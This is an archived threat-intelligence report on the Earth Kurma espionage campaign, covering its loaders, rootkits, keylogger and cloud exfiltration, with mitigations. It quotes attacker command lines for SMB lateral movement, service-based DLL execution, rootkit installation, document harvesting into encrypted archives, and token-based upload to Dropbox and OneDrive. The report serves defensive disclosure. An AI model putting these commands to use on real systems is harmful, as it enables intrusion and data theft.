{ "id": "4b3f1ed3-5d78-4c4d-a135-ac88ccda3243", "created_at": "2026-04-06T00:19:19.931072Z", "updated_at": "2026-04-10T03:33:16.339799Z", "deleted_at": null, "sha1_hash": "ec8f819146307c99d9a2abf00349ac9e4e30bba3", "title": "Earth Kurma APT Campaign Targets Southeast Asian Government Telecom Sectors", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1691992, "plain_text": "Earth Kurma APT Campaign Targets Southeast Asian\r\nGovernment Telecom Sectors\r\nBy By: Nick Dai, Sunny Lu Apr 25, 2025 Read time: 11 min (3023 words)\r\nPublished: 2025-04-25 · Archived: 2026-04-05 13:29:38 UTC\r\nSummary:\r\nTrend Research uncovered a sophisticated APT campaign targeting government and telecommunications\r\nsectors in Southeast Asia. Named Earth Kurma, the attackers use advanced custom malware, rootkits, and\r\ncloud storage services for data exfiltration. Earth Kurma demonstrates adaptive malware toolsets, strategic\r\ninfrastructure abuse, and complex evasion techniques.\r\nThis campaign poses a high business risk due to targeted espionage, credential theft, persistent foothold\r\nestablished through kernel-level rootkits, and data exfiltration via trusted cloud platforms.\r\nOrganizations primarily in government and telecommunications sectors in Southeast Asia (particularly the\r\nPhilippines, Vietnam, Thailand, Malaysia) are affected. Organizations face potential compromise of\r\nsensitive government and telecommunications data, with attackers maintaining prolonged, undetected\r\naccess to their networks.\r\nTrend Vision One™ detects and blocks the malicious components used in the APT campaign. Trend Vision\r\nOne customers can also access hunting queries, threat insights, and threat intelligence reports to gain rich\r\ncontext and the latest updates on Earth Kurma.\r\nIntroduction\r\nSince June 2024, we uncovered a sophisticated APT campaign targeting multiple countries in Southeast Asia,\r\nincluding the Philippines, Vietnam, and Malaysia. We have named the threat actors behind this campaign “Earth\r\nKurma.” Our analysis revealed that they primarily focused on government sectors, showing particular interest in\r\ndata exfiltration. Notably, this wave of attacks involved rootkits to maintain persistence and conceal their\r\nactivities.\r\nIn this research, we provide the intelligence on Earth Kurma and their ongoing activities. We’ll disclose technical\r\ndetails, including their tactics, techniques and procedures (TTPs), as well as specifics on their toolsets, such as\r\nTESDAT, SIMPOBOXSPY, KRNRAT, and MORIYA, among others.\r\nWho is Earth Kurma?\r\nEarth Kurma is a new APT group focused on countries in Southeast Asia. All of the identified victims belong to\r\ngovernment and government-related telecommunications sectors. From our long-term monitoring, their activities\r\ndated back to November 2020, with data exfiltration as their primary objective. Our analysis indicates that they\r\ntend to exfiltrate data over public cloud services, like Dropbox and OneDrive. To accomplish this, they used\r\nvarious customized toolsets including TESDAT and SIMPOBOXSPY.   Earth Kurma also developed rootkits such\r\nas KRNRAT and MORIYA to hide their activities.\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 1 of 15\n\nAs for attribution, we found overlaps between Earth Kurma’s tools and those of other known APT groups. The\r\nMORIYA rootkits in this campaign share the same code base as the ones used in Operation TunnelSnake, while\r\nSIMPOBOXSPY and the exfiltration script link closely to another APT group called ToddyCat. However,\r\ndifferences in the attack patterns prevent us from conclusively attributing these campaigns and operations to the\r\nsame threat actors. Hence, we named this new APT group “Earth Kurma.”\r\nImpact\r\nOur telemetry shows that that Earth Kurma targeted victims primarily in Southeast Asia, including the Philippines,\r\nVietnam, Thailand and Malaysia. Earth Kurma’s targets likely indicate cyberespionage as the motivation.\r\nFigure 1. The victimology distribution\r\nInfection Chain\r\nThe infection chain and malware used could be summarized as follows:\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 2 of 15\n\nFigure 2. The full infection flow of Earth Kurma’s attacks\r\nLateral Movement\r\nWe were unable to confirm the arrival vectors used in the attacks, as our analysis started years after the victims\r\nwere first compromised.\r\nMultiple tools were used in the lateral movement stage. Various utilities were used to scan the victims’\r\ninfrastructures and deploy malware, including NBTSCAN, LADON, FRPC, WMIHACKER and ICMPinger.\r\nThey also deployed a keylogger, KMLOG, to steal credentials from victims.\r\nTo survey the victims’ infrastructures, the threat actors used a tool named ICMPinger to scan the hosts. It is a\r\nsimple network scanning tool based on the ICMP protocol to test if the specified hosts are still alive. They delete\r\nthis tool once their operations conclude.\r\nFigure 3. The usage of ICMPinger, showing tasks being completed\r\nThey also used another open-source tool called Ladon to inspect the infrastructure. To bypass detection, Ladon is\r\nwrapped in a reflective loader compiled by PyInstaller. The XOR keys used to decode the payload differ among all\r\nthe samples we’ve collected.\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 3 of 15\n\nFigure 4. The reflective loading procedures for Ladon\r\nTo move laterally, they also used another open-source tool called WMIHACKER, which  could execute\r\ncommands over port 135 without the need for SMB.\r\nFigure 5. The script body of WMIHACKER\r\nIn some of the cases we observed, they also execute commands over the SMB protocol (such as using “net use”)\r\nto inspect the infrastructure as well as deploy malware.\r\nC:\\Windows\\system32\\cmd.exe /C sc.exe -a 172.20.40.0-172.20.40.255 -t 500 -f lg.txt -c 1 -o 100 –n\r\nC:\\Windows\\system32\\cmd.exe /C net use \\\\172.20.40.41\\c$ {password} /u:{user}\r\nC:\\Windows\\system32\\cmd.exe /C copy vdmsc.dll \\\\172.20.40.41\\c$\\users\\{user} \\videos\r\nC:\\Windows\\system32\\cmd.exe /C copy msv.dat \\\\172.20.40.41\\c$\\windows\\system32\r\nC:\\Windows\\system32\\cmd.exe /C sc \\\\172.20.40.41 create katech binpath= \"cmd /c start /b rundll32.exe c:\\users\\\r\n{user}\\videos\\vdmsc.dll,Init\"\r\nC:\\Windows\\system32\\cmd.exe /C sc \\\\172.20.40.41 start katech\r\nC:\\Windows\\system32\\cmd.exe /C sc \\\\172.20.40.41 delete katech\r\nC:\\Windows\\system32\\cmd.exe /C net use \\\\172.20.40.41\\c$ /del /y\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 4 of 15\n\nThe threat actors also tried to steal the credentials from the victims by using a custom tool called KMLOG. It’s a\r\nsimple keylogger that logs every keystroke to a file named\r\n“%Appdata%\\Roaming\\Microsoft\\Windows\\Libraries\\infokey.zip.”\r\nFigure 6. The keystroke logs\r\nTo hide the keystroke log file, it is prepended with a fake ZIP file header (PK header). What follows the header is\r\nthe real body of the logging content.\r\nTitle Encryption Data\r\nHeader None Predefined PK file header\r\n[Title]\r\nXOR 0xDB\r\nGetForegroundWindow title text\r\n[Time] GetLocalTime\r\n[Content] Keystrokes\r\nTable 1. The structure of the keystroke logging file\r\nPersistence\r\nIn the persistence stage, the actors deployed different loaders to maintain their foothold, including DUNLOADER,\r\nTESDAT and DMLOADER. These loaders are used to load payload files into memory and execute them. These\r\nloaders are then used to deploy more malware and exfiltrate data over public cloud services like Dropbox and\r\nOneDrive. In some cases, rootkits, including KRNRAT and MORIYA, were implanted by the loaders to bypass\r\nthe scanning.\r\nLoaders\r\nBetween 2022 and 2024, we observed multiple loaders implanted in victim environments, including\r\nDUNLOADER, TESDAT and DMLOADER. Most of the final payloads are Cobalt Strike beacons.\r\nThe first loader we encountered is DUNLOADER. It’s capable of loading the payloads from either of the\r\nlocations and decode it in one-byte XOR operations:\r\nFrom a file named “pdata.txt”\r\nFrom its own resource blob named “BIN”\r\nThis loader is a DLL file and always ensures that it’s executed by “rundll32.exe” by checking if the name of the\r\nparent process contains a specific string literal “und”. In most cases, this DLL should contain an export function\r\ncalled “Start.”\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 5 of 15\n\nFigure 7. The process name checking routine in DUNLOADER (top) and the shellcode invocation\r\nroutine in TESDAT (bottom)\r\nThe newer loader we later found is called TESDAT. It always loads a payload file with a “.dat” extension (like\r\n“mns.dat”). Instead of using common APIs like CreateThread to execute the decoded shellcode, it always calls an\r\nAPI called “SwitchToFiber,” which we think is an attempt to avoid detection. Our analysis showed two variants\r\nfor TESDAT loaders. It can be either an EXE file or a DLL file with an export function called “Init.”\r\nWe also noticed that the actors would name the loaders with some random strings and put them inside the folders\r\nthat were often accessed by the victims instead of those commonly used by attackers (i.e., %ProgramData% or\r\n%Public%). This was presumably intended to blend the loaders with legitimate user files. Here are some filename\r\nexamples:\r\nC:\\Users\\{user}\\downloads\\wcrpc.dll\r\nC:\\Users\\{user}\\downloads\\mflpro\\acrg.dll\r\nC:\\Users\\{user}\\documents\\ViberDownloads\\mfsvc.dll\r\nC:\\Users\\{user}\\downloads\\fwdjustification\\dilx.exe\r\nC:\\Users\\{user}\\downloads\\ffap3560pcl6220510w636iml\\drasc.dll\r\nC:\\Users\\{user}\\downloads\\1\\2\\3\\prikc.exe\r\nC:\\Users\\{user}\\Downloads\\Rufus\\gpupdat.exe\r\nMore recently, we observed a new loader, DMLOADER, was implanted. Instead of loading an additional payload\r\nfile, it loads the embedded payload and decodes it as an in-memory PE buffer. This loader usually has an export\r\nfunction called “DoMain” or “StartProtect.” In the decoded PE payload, it should have an export function called\r\n“MThread.”\r\nRootkits\r\nAfter the loaders are implanted in the victim machines, we found rootkits installed on some compromised\r\nmachines. To install the rootkits, the threat actor abused a living-off-the-land binary called “syssetup.dll” and\r\ndropped an INF file to install them. An example of the used command line is as follows:\r\nC:\\Windows\\SysWOW64\\rundll32.exe syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\\users\\\r\n{user}\\downloads\\SmartFilter.inf\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 6 of 15\n\nThe first rootkit we observed is called MORIYA, which could hide the malicious payload in the TCP traffic.\r\nMORIYA works as a TCP traffic interceptor. It tries to monitor if an incoming TCP packet is from the command-and-control (C\u0026C) server by checking its first six magic bytes. The magic bytes could be registered by issuing a\r\nspecific IOCTL code 0x222004 from its user-mode agent. If any packet is matched, it tries to inject the malicious\r\npayload into the body of the response packet. The variant we found works exactly the same as the one from this\r\nMORIYA report.\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 7 of 15\n\nFigure 8. The IOCTL code in MORIYA (top) and the working flow for MORIYA (bottom)\r\nThe MORIYA variant we found has an additional shellcode injection capability. At the end of its execution, it tries\r\nto load a payload file from the location ”\\\\SystemRoot\\\\system32\\\\drivers\\\\{driver_name}.dat.” The payload will\r\nbe decrypted in AES and injected into the process of svchost.exe. This payload should be its user-mode agent.\r\nFigure 9. The shellcode injection routine in MORIYA\r\nThe shellcode will eventually be invoked by using the API NtCreateThreadEx. To bypass detection, it tries to\r\ninvoke the call by directly using the syscall number. To get the valid syscall numbers on the targeted system, it\r\nenumerates the NTDLL’s export functions, finds the ones with names starting with “Zw” or “Nt” and saves the\r\nsyscall number of each. This code snippet is reused from this post.\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 8 of 15\n\nFigure 10. The NTDLL enumeration routine in MORIYA\r\nThe other rootkit we found is called KRNRAT. It’s a full-featured backdoor with various capabilities, including\r\nprocess manipulation, file hiding, shellcode execution, traffic concealment, and C\u0026C communication. We named\r\nthis rootkit KRNRAT because of its internal name, just as written in its PDB string:\r\nN:\\project\\li\\ThreeTools\\KrnRat\\code\\x64\\Debug\\SmartFilter.pdb\r\nOur analysis showed that KRNRAT is based upon multiple open-source projects:\r\nhttps://github.com/w1nds/ishellcode\r\nhttps://github.com/DarthTon/Blackbone\r\nhttps://github.com/XaFF-XaFF/Cronos-Rootkit\r\nhttps://github.com/JKornev/hidden\r\nhttps://github.com/amitschendel/venom-rootkit\r\nKRNRAT supports numerous IOCTL codes and capabilities. Its debug strings are also self-explanatory. Here’s the\r\nfull table of the supported IOCTL codes.\r\nIoControlCode  Description (Debug Strings)\r\n0x222000  IOCTL_TERMINATE_PROCESS \r\n0x22200C  IOCTL_SUSPEND_PROCESS \r\n0x222010 \r\nIOCTL_TERMINATE_PROCESS (Misspelled, it should be\r\nIOCTL_RESUME_PROCESS)\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 9 of 15\n\n0x222014  IOCTL_ADD_BLACK_PROCESS \r\n0x222018  IOCTL_REMOVE_BLACK_PROCESS \r\n0x22201C  IOCTL_ADD_HIDDEN_FILE \r\n0x222020  IOCTL_ADD_HIDDEN_DIR \r\n0x222024  IOCTL_REMOVE_HIDDEN_FILE \r\n0x222040  IOCTL_REMOVE_HIDDEN_DIR \r\n0x222048  IOCTL_REMOVE_HIDDEN_PROCESS \r\n0x22204C  IOCTL_ADD_LOCAL_HIDDEN_PORT \r\n0x222050  IOCTL_REMOVE_LOCAL_HIDDEN_PORT \r\n0x222054  IOCTL_ADD_REMOTE_HIDDEN_PORT \r\n0x222058  IOCTL_REMOVE_REMOTE_HIDDEN_PORT \r\n0x22205C  IOCTL_REMOVE_LOCAL_HIDDEN_PORT \r\n0x222060  IOCTL_REMOVE_LOCAL_HIDDEN_IP \r\n0x222064  IOCTL_ADD_REMOTE_HIDDEN_IP \r\n0x222080  IOCTL_REMOVE_REMOTE_HIDDEN_IP \r\n0x222084  IOCTL_REMOVE_ALL_HIDDEN_NET \r\n0x222088  IOCTL_PROTECT_PROCESS \r\n0x22208C  IOCTL_ELEVATE_PROCESS \r\n0x222090  IOCTL_INJECT_SHELLCODE\r\nTable 2. The command codes supported in KRNRAT\r\nAt the end of its execution, it also loads the additional payload file and injects it into the svchost.exe process. This\r\nshellcode injection capability works exactly the same as the MORIYA variant we found. This time, we were able\r\nto collect the payload, which turns out to be the user-mode agent for KRNRAT and is the backdoor. This means\r\nthat its user-mode agent is always memory-resident.\r\nThe backdoor is a stager. It connects to the C\u0026C server and downloads the next-stage payload back. It tries to hide\r\nthe process and connections by issuing the specific IOCTL codes to the KRNRAT rootkit.\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 10 of 15\n\nFigure 11. How the backdoor used KRNRAT to hide its process\r\nFigure 12. How the backdoor used KRNRAT to hide outbound IPs\r\nOffset Size Name Description\r\n0x0 0x8 minutes The sleep minutes\r\n0x8 0x4 hourStart The number of hour that the current time is after\r\n0xC 0x4 hourEnd The number of hour that the current time is before\r\n0x10 0x4 reserved  \r\n0x14 0x4 dayOfWeekStart The number of day of week that the current time is after\r\n0x18 0x4 dayOfWeekEnd The number of day of week that the current time is before\r\nTable 3. The structure of the backdoor’s configuration in the registry\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 11 of 15\n\nThe final payload from the C\u0026C server would be the so-called SManager.\r\nFigure 13. The SManager’s export function “GetPluginInformation”\r\nCollection and Exfiltration\r\nIn the collection and exfiltration stage, we observed two customized tools used to exfiltrate specific documents to\r\nthe attacker’s cloud services, such as Dropbox and OneDrive. Before exfiltrating the files, several commands\r\nexecuted by the loader TESDAT collected specific document files with the following extensions: .pdf, .doc, .docx,\r\n.xls, .xlsx, .ppt, and .pptx. The documents are first placed into a newly created folder named \"tmp,\" which is then\r\narchived using WinRAR with a specific password.\r\nC:\\Windows\\system32\\cmd.exe /C dir c:\\users\r\nC:\\Windows\\system32\\cmd.exe /C mkdir tmp\r\nC:\\Windows\\system32\\cmd.exe /C powershell.exe \"dir c:\\users -File -Recurse -Include '*.pdf', '*.doc', '*.docx',\r\n'*.xls', '*.xlsx', '*.ppt' , '*.pptx'| where LastWriteTime -gt (Get-date).AddDays(-30) | foreach {cmd /c copy $_ /y\r\nc:\\users\\{username}\\documents\\tmp};echo Finish!\"\r\nC:\\Windows\\system32\\cmd.exe /C c:\\\"program files\"\\winrar\\rar.exe a -p{password} -v200m c:\\users\\\r\n{username}\\documents\\{hostname} c:\\users\\{username}\\documents\\tmp -ep\r\nC:\\Windows\\system32\\cmd.exe /C rmdir /s /q tmp\r\nThe first tool, SIMPOBOXSPY, is an exfiltration tool that can upload the archive files to Dropbox with a specified\r\naccess token. This tool is exactly the “generic DropBox uploader” mentioned in this ToddyCat report. The\r\ncommand argument of SIMPOBOXSPY is shown below.\r\ndilx.exe {access_token} [-f {file_1} {file_2} ...]\r\nIf the argument “-f” is not specified, it will upload the file in the current folder with predefined extensions such as\r\n“.z”, “.001”, “.002”,...,”.128”. There is also another variant, which will upload the archive with the extension “.7z”\r\nAfter uploading the files to Dropbox, a folder named with the current date and time will be created on Dropbox.\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 12 of 15\n\nFigure 14. The SIMPOBOXSPY’s stdout\r\nThe other tool, ODRIZ, is an old tool found in 2023. It will upload the collected files to OneDrive by specifying\r\nthe OneDrive refresh token. The command argument is shown below. It will upload the files in the current folder\r\nwith the pattern “*.z.*”.\r\nodriz.exe {refresh_token}\r\nFigure 15. The usage of ODRIZ (top) and the codes in ODRIZ (bottom)\r\nThe process of file collection and exfiltration is shown in the following:\r\nFigure 16. The exfiltration flow\r\nAfter collecting all the files into a password-protected archive, which is normally named after the host name, the\r\narchived RAR will be copied to the folder \\\\DC_server\\sysvol\\{domain}\\Policies\\{ID}\\user\\ via the SMB protocol.\r\nThe folder “sysvol” contains all of AD policies and information, and this folder only exists on DC servers. We\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 13 of 15\n\nbelieve that the attackers move all the collected archives in the folder “sysvol” to utilize a native Windows\r\nmechanism called Distributed File System Replication (DFSR). It is a Windows feature that synchronizes AD\r\npolicies across DC servers by replicating the contents of the “sysvol” folder among them. With this, the stolen\r\narchives can be automatically synchronized to all DC servers, enabling exfiltration through any one of them.\r\nAttribution\r\nOur analysis identified weak links to two groups, ToddyCat and Operation TunnelSnake. After a thorough\r\nexamination, we determined that this campaign merited a separate designation, Earth Kurma.\r\nThe APT group ToddyCat was first disclosed in 2022. The \"tailored loader,” mentioned in this ToddyCat report,\r\nwas also found in the same victim machines infected by the TESDAT loaders. However, we did not find any\r\nprocess execution logs between these loaders. Also, they share similar exfiltration PowerShell scripts. The tool\r\nSIMPOBOXSPY used by Earth Kurma was also used by ToddyCat before.\r\nBoth Earth Kurma and ToddyCat highly targeted Southeast Asian countries. Reports on ToddyCat indicate that\r\nactivities started in 2020. The timeline of their activities aligned closely to what we observed in Earth Kurma.\r\nHowever, SIMPOBOXSPY is a simple tool that could be shared among groups, and we did not observe other\r\nexclusive tools that can be directly attributed to ToddyCat. Thus, we cannot conclusively link Earth Kurma to\r\nToddyCat.\r\nThe second potentially related APT group is Operation TunnelSnake, which was also reported in 2021. In the\r\nreport they used MORIYA, which uses the same code base as the MORIYA variant we found. Additionally,\r\nOperation TunnelSnake targeted countries in Southeast Asia. Nevertheless, we didn’t observe any similarity in the\r\npost-exploitation stages.\r\nSecurity best practices\r\nEarth Kurma remains highly active, continuing to target countries around Southeast Asia. They have the capability\r\nto adapt to victim environments and maintain a stealthy presence. They can also reuse the same code base from\r\npreviously identified campaigns to customize their toolsets, sometimes even utilizing the victim’s infrastructure to\r\nachieve their goals.\r\nHere are some best security practices to mitigate such threats:\r\nEnforce strict driver installation policies. Allow only digitally signed and explicitly approved drivers\r\nthrough Group Policies or application control solutions to prevent malicious rootkits.\r\nStrengthen Active Directory (AD) and DFSR controls. Secure AD’s sysvol directory and closely audit\r\nDFSR replication events to prevent misuse for stealthy data exfiltration.\r\nimit SMB communications. Restrict SMB protocol usage across the network to prevent lateral movement\r\nand unauthorized file transfers.\r\nProactive security with Trend Vision One™\r\nTrend Vision One™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure\r\nmanagement, security operations, and robust layered protection. This comprehensive approach helps you predict\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 14 of 15\n\nand prevent threats, accelerating proactive security outcomes across your entire digital estate. Backed by decades\r\nof cybersecurity leadership and Trend Cybertron, the industry's first proactive cybersecurity AI, it delivers proven\r\nresults: a 92% reduction in ransomware risk and a 99% reduction in detection time. Security leaders can\r\nbenchmark their posture and showcase continuous improvement to stakeholders. With Trend Vision One, you’re\r\nenabled to eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner\r\nfor innovation.\r\nTrend Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Vision One customers can access a range of Intelligence Reports and\r\nThreat Insights. Threat Insights helps customers stay ahead of cyber threats before they happen and allows them to\r\nprepare for emerging threats by offering comprehensive information on threat actors, their malicious activities,\r\nand their techniques. By leveraging this intelligence, customers can take proactive steps to protect their\r\nenvironments, mitigate risks, and effectively respond to threats. \r\nTrend Vision One Intelligence Reports App [IOC Sweeping]\r\nEarth Kurma Uncovered: Cyber Threats to Southeast Asian Governments\r\nTrend Vision One Threat Insights App\r\nThreat Actors: Earth Kurma\r\nEmerging Threats: Earth Kurma Uncovered: Cyber Threats to Southeast Asian Governments\r\nHunting Queries\r\nTrend Vision One Search App\r\nTrend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this\r\nblog post with data in their environment.    \r\nScan for the Earth Kurma malware detections:\r\nmalName: (*DUNLOADER* OR *TESDAT* OR *DMLOADER* OR *MORIYA* OR *KRNRAT* OR\r\n*SIMPOBOXSPY* OR *ODRIZ* OR *KMLOG*) AND eventName: MALWARE_DETECTION\r\nIndicators of Compromise (IoC)\r\nThe indicators of compromise for this entry can be found here. \r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA" ], "references": [ "https://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html" ], "report_names": [ "earth-kurma-apt-campaign.html" ], "threat_actors": [ { "id": "7c390b96-8206-4194-81d8-ebbabb9910ff", "created_at": "2023-12-03T02:00:05.147496Z", "updated_at": "2026-04-10T02:00:03.486417Z", "deleted_at": null, "main_name": "TunnelSnake", "aliases": [], "source_name": "MISPGALAXY:TunnelSnake", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4b48e4b6-09b0-4f4d-a78c-6b455d122e67", "created_at": "2022-10-25T16:07:24.020115Z", "updated_at": "2026-04-10T02:00:04.84333Z", "deleted_at": null, "main_name": "Operation TunnelSnake", "aliases": [], "source_name": "ETDA:Operation TunnelSnake", "tools": [ "Moriya" ], "source_id": "ETDA", "reports": null }, { "id": "222835b0-22fb-406e-8fd5-f36dae694212", "created_at": "2025-06-29T02:01:56.985922Z", "updated_at": "2026-04-10T02:00:04.666399Z", "deleted_at": null, "main_name": "Earth Kurma", "aliases": [], "source_name": "ETDA:Earth Kurma", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "DMLOADER", "DUNLOADER", "KRNRAT", "Moriya", "ODRIZ", "SIMPOBOXSPY", "TESDAT", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "d67df52c-a901-4d55-b287-321818500789", "created_at": "2024-04-24T02:00:49.591518Z", "updated_at": "2026-04-10T02:00:05.314272Z", "deleted_at": null, "main_name": "ToddyCat", "aliases": [ "ToddyCat" ], "source_name": "MITRE:ToddyCat", "tools": [ "Cobalt Strike", "LoFiSe", "China Chopper", "netstat", "Pcexter", "Samurai" ], "source_id": "MITRE", "reports": null }, { "id": "4c4e1108-8c11-48e3-91e3-95c24042f3a5", "created_at": "2022-10-25T16:07:24.329539Z", "updated_at": "2026-04-10T02:00:04.939013Z", "deleted_at": null, "main_name": "ToddyCat", "aliases": [ "Operation Stayin’ Alive", "Storm-0247" ], "source_name": "ETDA:ToddyCat", "tools": [ "CHINACHOPPER", "China Chopper", "Cuthead", "FRP", "Fast Reverse Proxy", "Impacket", "Krong", "LoFiSe", "Ngrok", "PcExter", "PsExec", "SIMPOBOXSPY", "Samurai", "SinoChopper", "SoftEther VPN", "TomBerBil", "WAExp" ], "source_id": "ETDA", "reports": null }, { "id": "f161dc2b-a18e-43b9-9786-2285bc745a10", "created_at": "2025-05-29T02:00:03.214326Z", "updated_at": "2026-04-10T02:00:03.867482Z", "deleted_at": null, "main_name": "Earth Kurma", "aliases": [], "source_name": "MISPGALAXY:Earth Kurma", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "60d96824-1767-4b97-a6c7-7e9527458007", "created_at": "2023-01-06T13:46:39.378701Z", "updated_at": "2026-04-10T02:00:03.307846Z", "deleted_at": null, "main_name": "ToddyCat", "aliases": [ "Websiic" ], "source_name": "MISPGALAXY:ToddyCat", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434759, "ts_updated_at": 1775791996, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ec8f819146307c99d9a2abf00349ac9e4e30bba3.pdf", "text": "https://archive.orkl.eu/ec8f819146307c99d9a2abf00349ac9e4e30bba3.txt", "img": "https://archive.orkl.eu/ec8f819146307c99d9a2abf00349ac9e4e30bba3.jpg" } }